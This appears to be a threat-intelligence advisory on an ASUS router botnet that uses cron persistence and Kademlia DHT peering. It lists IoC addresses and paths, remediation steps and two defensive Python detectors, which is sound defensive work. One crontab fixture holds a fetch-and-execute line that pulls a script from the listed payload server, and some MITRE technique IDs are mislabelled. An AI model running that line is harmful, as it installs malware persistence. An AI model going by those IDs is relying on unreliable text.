Technical Analysis & Remediation
MITRE ATT&CK Mapping
T1037 (Boot or Logon Initialization Scripts) - Persistence via cron jobs.
T1090.001 (Impair Defenses: Disable or Modify Tools) - Closes port 22 via iptables.
T1095 (Non-Application Layer Protocol) - Custom Kademlia DHT communication.
T1090.002 (Proxy: External Proxy) - Traffic routed via the Doppelganger service.
CVE Profile
Unknown / NVD Score: N/A
[CISA KEV Status: Inactive/Unknown].
The delivery vector (The Origin) is currently undefined in the provided telemetry; classified as "Origin: Insufficient Evidence."
Telemetry
IPs
212.104.141[.]140 (Initial Payload Server)
45.135.180[.]38 (Persistent DHT Node)
45.135.180[.]177 (Persistent DHT Node)
Files/Paths
aic.sh
/jffs/.asusrouter
kad (ELF binary)
fwr.sh
/tmp/.sose
Artifacts
The script sets up a cron job that runs at the 55-minute mark of every hour to download aic.sh and rename it to /jffs/.asusrouter. The ELF payload generates a custom infohash by XORing the hardcoded string below with NTP server time data and system uptime.
"6YL5aNSQv9hLJ42aDKqmnArjES4jxRbfPTnZDdBdpRhJkHJdxqMQmeyCrkg2CBQg"
Constraint
The structure resembles a highly modular botnet, where the initial script bootstraps the host, the ELF binary establishes P2P communications, and secondary payloads (fwr.sh, .sose) fortify the node and assign C2 endpoints.
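The cron persistence above leaves a recognisable trace on the device. The following Python script is an added example (not code from the report, Lumen Black Lotus Labs or BleepingComputer) that parses a crontab dump collected from a router and flags entries matching the reported pattern: the :55 hourly schedule, the file paths and the addresses listed under Telemetry. The crontab contents, including the wget command line and download URL in the :55 entry, are constructed for illustration; the IoC paths and addresses are the ones the report lists, and the addresses are refanged from the defanged form before matching.

```python
import re

# Constructed crontab dump (assumption for illustration), e.g. what a defender
# would collect from the router's cron spool. Only the :55 entry is modelled on
# the persistence described in the report; its URL and command line are assumed.
SAMPLE_CRONTAB = """\
# rotate logs nightly
0 3 * * * /sbin/logrotate_wrapper
55 * * * * wget -q http://212.104.141.140/aic.sh -O /jffs/.asusrouter && sh /jffs/.asusrouter
*/5 * * * * /usr/sbin/ntpclient_check
"""

# IoCs as listed in the Telemetry section (addresses kept defanged, as in the report)
IOC_PATHS = ("/jffs/.asusrouter", "aic.sh", "fwr.sh", "/tmp/.sose")
IOC_IPS_DEFANGED = ("212.104.141[.]140", "45.135.180[.]38", "45.135.180[.]177")


def refang(ioc: str) -> str:
    """Turn a defanged IoC (1.2.3[.]4) back into its matchable form."""
    return ioc.replace("[.]", ".")


IOC_IPS = tuple(refang(ip) for ip in IOC_IPS_DEFANGED)

# Five schedule fields followed by the command
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def parse_crontab(text: str) -> list[dict]:
    """Split a crontab dump into entries; comments, blank and environment lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue  # e.g. SHELL=/bin/sh or a malformed line
        minute, hour, _dom, _mon, _dow, cmd = m.groups()
        entries.append({"minute": minute, "hour": hour, "cmd": cmd, "raw": line})
    return entries


def classify(entry: dict) -> list[str]:
    """Return the reasons an entry matches the reported pattern (empty list if none)."""
    reasons = []
    if entry["minute"] == "55" and entry["hour"] == "*":
        reasons.append("runs at :55 every hour (schedule reported for the dropper)")
    for path in IOC_PATHS:
        if path in entry["cmd"]:
            reasons.append(f"references IoC path {path}")
    for ip in IOC_IPS:
        if ip in entry["cmd"]:
            reasons.append(f"contacts IoC address {ip}")
    return reasons


def find_suspicious(text: str) -> list[tuple[str, list[str]]]:
    """(raw entry, reasons) for every entry that matches at least one indicator."""
    return [(e["raw"], r) for e in parse_crontab(text) if (r := classify(e))]


if __name__ == "__main__":
    for raw, reasons in find_suspicious(SAMPLE_CRONTAB):
        print(raw)
        for r in reasons:
            print("   -", r)
```

Feed it the real spool contents from a suspect device rather than the constructed sample; a hit on the schedule alone is weak, while a hit on the /jffs/.asusrouter path or a listed address is a strong match and should trigger the home-user or enterprise track below.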
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command: Audit hardware inventory and supply chain policies for all SOHO/edge routers deployed to remote workers.
DETECT (DE) – Monitoring & Analysis
Command: Query SIEM and edge firewalls for outbound connections to 212.104.141[.]140, 45.135.180[.]38, and 45.135.180[.]177.
Command: Monitor network flow logs for endpoints reaching out to public BitTorrent trackers or exhibiting high-volume P2P DHT traffic.
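The two DETECT steps above can be prototyped over flow records before they are turned into a SIEM query. The Python below is an added example (not code from the report or its sources): it takes the three Telemetry addresses in their defanged form, refangs them, matches flow destinations against them, and separately computes per-source UDP peer fan-out within a time bucket, since a Kademlia DHT node talks to many distinct peers in a short period while ordinary client traffic does not. The flow records, the internal addresses, the 300-second bucket and the fan-out threshold of 25 are all constructed assumptions to be tuned against real data.

```python
from collections import defaultdict

# IoC addresses from the Telemetry section, kept defanged as delivered
IOC_IPS_DEFANGED = ("212.104.141[.]140", "45.135.180[.]38", "45.135.180[.]177")
IOC_IPS = {ip.replace("[.]", ".") for ip in IOC_IPS_DEFANGED}

# Constructed flow records (assumption): (epoch_seconds, src, dst, proto, dst_port, bytes).
# 10.0.0.7 models an infected router: one fetch from the payload server, one UDP
# exchange with a listed DHT node, then a burst of UDP traffic to 40 distinct peers
# in the 198.51.100.0/24 documentation range. 10.0.0.5 is a benign host.
SAMPLE_FLOWS = [
    (1700000000, "10.0.0.5", "203.0.113.10", "tcp", 443, 5120),
    (1700000010, "10.0.0.7", "212.104.141.140", "tcp", 80, 2048),
    (1700000050, "10.0.0.7", "45.135.180.38", "udp", 6881, 412),
    (1700000060, "10.0.0.5", "203.0.113.11", "udp", 53, 96),
] + [
    (1700000100 + i, "10.0.0.7", f"198.51.100.{i}", "udp", 6881, 300)
    for i in range(1, 41)
]


def ioc_hits(flows):
    """Flows whose destination is one of the listed IoC addresses (the SIEM query step)."""
    return [f for f in flows if f[2] in IOC_IPS]


def udp_fanout(flows, window=300):
    """Largest number of distinct UDP destinations each source reached inside any
    single `window`-second bucket. Port is deliberately ignored: DHT peers use
    arbitrary ports, so counting peers is more robust than matching 6881."""
    peers = defaultdict(set)  # (src, bucket) -> {dst, ...}
    for ts, src, dst, proto, _port, _nbytes in flows:
        if proto == "udp":
            peers[(src, ts // window)].add(dst)
    fanout = defaultdict(int)
    for (src, _bucket), dsts in peers.items():
        fanout[src] = max(fanout[src], len(dsts))
    return dict(fanout)


def flag_dht_like(flows, threshold=25, window=300):
    """Sources whose UDP fan-out meets the threshold (an assumed tuning value)."""
    return sorted(src for src, n in udp_fanout(flows, window).items() if n >= threshold)


if __name__ == "__main__":
    for ts, src, dst, proto, port, _ in ioc_hits(SAMPLE_FLOWS):
        print(f"IoC contact: {src} -> {dst} {proto}/{port} at {ts}")
    print("DHT-like fan-out:", flag_dht_like(SAMPLE_FLOWS))
```

An IoC hit is actionable on its own; the fan-out heuristic needs a baseline, because legitimate BitTorrent clients, some games and VoIP software also produce wide UDP fan-out, so treat it as a triage signal that prioritises which edge devices to inspect with the crontab and file-path checks.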
RESPOND (RS) – Mitigation & Containment
Command: Block the identified initial payload server and persistent DHT node IP addresses at the perimeter WAF and proxy layers.
Command: Isolate VPN connections originating from known infected residential IPs executing password spraying or anomalous authentication attempts.
RECOVER (RC) – Restoration & Trust
Command: Force a hard factory reset and firmware re-flash of any suspected corporate-owned ASUS edge networking gear.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command: Deprecate and replace any edge devices that have reached manufacturer end-of-life (EOL) and enforce strong, non-default administrative credentials.
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command: Disconnect from the internet immediately. (Applies if you are currently using an ASUS router matching these IoCs.)
Command: Do not log into banking/email until the device is verified clean.
Priority 2: Identity
Command: Reset administrative passwords for the router management interface using a known clean device (e.g., a phone on 5G).
Priority 3: Persistence
Command: Perform a hard factory reset of the ASUS router to clear malicious payloads from the /jffs and /tmp partitions.
Command: Update the router to the latest manufacturer firmware, disable remote management on the WAN interface, and routinely reboot the device.
Hardening & References
Baseline: CIS Benchmarks for Network Devices.
Framework: NIST CSF 2.0 / SP 800-61r3.
Reference: DHS CISA Binding Operational Directive (BOD) 23-02 on securing networking equipment.
Source: Lumen Black Lotus Labs; BleepingComputer.